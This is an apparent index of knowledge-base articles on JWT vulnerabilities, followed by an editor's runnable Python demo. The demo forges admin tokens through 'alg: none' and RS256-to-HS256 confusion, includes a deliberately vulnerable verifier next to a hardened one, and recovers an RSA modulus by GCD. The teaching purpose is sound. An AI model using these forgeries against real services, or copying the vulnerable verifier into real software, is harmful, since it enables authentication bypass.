Knowledge Base

In-depth technical articles on JWT vulnerabilities - cryptographic mechanics, vulnerable code patterns, real-world bug bounty cases, and mitigations.

01
JWT Structure & Internals

How JWTs are encoded, which header fields matter to an attacker, and how the JOSE family of standards fits together.

02
Unverified Signature

The server decodes the token but never calls the cryptographic verification function - any forged payload is accepted.

03
Algorithm None

RFC 7518 legitimises "none" as a valid algorithm. Vulnerable libraries accept unsigned tokens when the header says so.

04
Algorithm Confusion

Switch alg from RS256 to HS256 - the library passes the RSA public key bytes to its HMAC routine as the secret, and a public key is by definition something the attacker already has.

05
KID Injection

The kid header selects which key to use. Unsanitised, it becomes a path traversal, SQL injection, or SSRF vector.

06
JWK Injection

Embed your own RSA public key in the jwk header parameter. A vulnerable server uses that embedded key to verify - so it checks the signature against the attacker's own key.

07
JKU Injection

Point jku at an attacker-controlled JWKS endpoint. The server fetches and trusts it for verification.

08
Public Key Recovery

Recover the RSA modulus from two RS256 signatures via GCD (n divides s^e - m for every genuine signature) - without server access and without a published key - then chain to algorithm confusion.
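The following worked example ties articles 02, 03, 04 and 08 together in one runnable script. It is an example added by the editor, not code from the JWT Arsenal knowledge base, and it substitutes toy crypto where the real thing would need a library: the RSA key is built from two Mersenne primes (a ~92-bit modulus) with e=17 rather than 65537, and message_rep is a stand-in for EMSA-PKCS1-v1_5 encoding. The JWK string, token layout, "none" handling, the algorithm-confusion forgery, the pinned-algorithm fix and the GCD recovery are the genuine mechanics; only the key size, exponent and padding are assumptions made so it runs from the standard library.

```python
import base64, hashlib, hmac, json, math

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

# Toy RSA key (assumption): two Mersenne primes, ~92-bit modulus, e=17.
# e=17 instead of 65537 only keeps s**e small enough for math.gcd below.
P, Q = (1 << 31) - 1, (1 << 61) - 1
N, E = P * Q, 17
D = pow(E, -1, (P - 1) * (Q - 1))
MOD_BYTES = (N.bit_length() + 7) // 8

# The public key as the server would publish it in a JWKS (real JWK shape).
PUBLIC_JWK = json.dumps({"kty": "RSA", "n": b64url(N.to_bytes(MOD_BYTES, "big")),
                         "e": b64url(E.to_bytes(1, "big"))}, separators=(",", ":"))

def message_rep(signing_input: bytes) -> int:
    # Toy stand-in for EMSA-PKCS1-v1_5: top 80 bits of SHA-256. Like the real
    # encoding it is always below N and computable without knowing N.
    return int.from_bytes(hashlib.sha256(signing_input).digest()[:10], "big")

def rs256_sign(signing_input: bytes, d: int, n: int) -> bytes:
    return pow(message_rep(signing_input), d, n).to_bytes(MOD_BYTES, "big")

def rs256_verify(signing_input: bytes, sig: bytes, jwk_text: str) -> bool:
    jwk = json.loads(jwk_text)
    n = int.from_bytes(b64url_decode(jwk["n"]), "big")
    e = int.from_bytes(b64url_decode(jwk["e"]), "big")
    return pow(int.from_bytes(sig, "big"), e, n) == message_rep(signing_input)

def hs256_sign(signing_input: bytes, secret: bytes) -> bytes:
    return hmac.new(secret, signing_input, hashlib.sha256).digest()

def encode(payload: dict, alg: str, key=None) -> str:
    """key is (d, n) for RS256, the HMAC secret bytes for HS256, unused for none."""
    seg = lambda obj: b64url(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = f"{seg({'typ': 'JWT', 'alg': alg})}.{seg(payload)}".encode()
    sig = {"none": lambda: b"", "HS256": lambda: hs256_sign(signing_input, key),
           "RS256": lambda: rs256_sign(signing_input, *key)}[alg]()
    return signing_input.decode() + "." + b64url(sig)

def parse(token: str):
    h, p, s = token.split(".")
    return (json.loads(b64url_decode(h)), json.loads(b64url_decode(p)),
            f"{h}.{p}".encode(), b64url_decode(s))

def decode_unverified(token: str) -> dict:
    # Article 02: decoding is not verification; the signature is never read.
    return parse(token)[1]

def verify_vulnerable(token: str, key_text: str):
    # Articles 03/04: trusts header['alg'] and hands the same key text to
    # whichever branch the header names.
    header, payload, signing_input, sig = parse(token)
    alg = header["alg"]
    ok = (alg == "none"
          or alg == "HS256" and hmac.compare_digest(sig, hs256_sign(signing_input, key_text.encode()))
          or alg == "RS256" and rs256_verify(signing_input, sig, key_text))
    return payload if ok else None

def verify_hardened(token: str, jwk_text: str, expected_alg: str = "RS256"):
    # Fix: pin the algorithm server-side; the header never gets to choose it.
    header, payload, signing_input, sig = parse(token)
    if header.get("alg") != expected_alg or not rs256_verify(signing_input, sig, jwk_text):
        return None
    return payload

def recover_modulus(token_a: str, token_b: str, e: int = E) -> int:
    # Article 08: n divides s**e - m for every genuine signature, so the gcd
    # of two such values is n times a (usually tiny) cofactor; trial division
    # strips it. Real tooling must guess e (65537 or 3) and use a bignum library.
    vals = []
    for token in (token_a, token_b):
        _, _, signing_input, sig = parse(token)
        vals.append(pow(int.from_bytes(sig, "big"), e) - message_rep(signing_input))
    g = math.gcd(*vals)
    for f in range(2, 1 << 16):
        while g % f == 0:
            g //= f
    return g

def demo() -> dict:
    legit = encode({"sub": "alice", "role": "user"}, "RS256", (D, N))
    legit2 = encode({"sub": "bob", "role": "user"}, "RS256", (D, N))
    forged_none = encode({"sub": "alice", "role": "admin"}, "none")
    # Algorithm confusion: the published public key text is the HMAC "secret".
    forged_hs = encode({"sub": "alice", "role": "admin"}, "HS256", PUBLIC_JWK.encode())
    return {
        "unverified": decode_unverified(forged_none)["role"],
        "vuln_none": verify_vulnerable(forged_none, PUBLIC_JWK)["role"],
        "vuln_confusion": verify_vulnerable(forged_hs, PUBLIC_JWK)["role"],
        "hard_legit": verify_hardened(legit, PUBLIC_JWK)["role"],
        "hard_forged": [verify_hardened(t, PUBLIC_JWK) for t in (forged_none, forged_hs)],
        "recovered_n": recover_modulus(legit, legit2) == N,
    }
```

Run demo() to see the vulnerable verifier grant "admin" to both forgeries while the hardened one rejects them and still accepts the genuine token; recover_modulus needs nothing but two tokens signed by the same key, which is why the public key is never safe to treat as a secret even when it is not published.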

JWT Arsenal_